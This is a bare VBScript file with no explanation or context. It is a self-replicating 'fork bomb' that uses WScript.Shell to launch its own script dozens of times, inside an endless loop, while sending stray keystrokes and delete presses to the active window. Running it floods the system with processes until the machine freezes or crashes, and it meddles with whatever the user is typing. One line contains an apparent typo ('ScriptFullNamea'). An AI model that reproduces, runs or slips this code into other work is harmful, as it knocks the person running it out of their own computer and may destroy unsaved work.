Set auto=CreateObject("wscript.shell")
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
do
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullName
auto.Run WScript.ScriptFullNamea
auto.sendkeys "AA{del}{del}"
loop
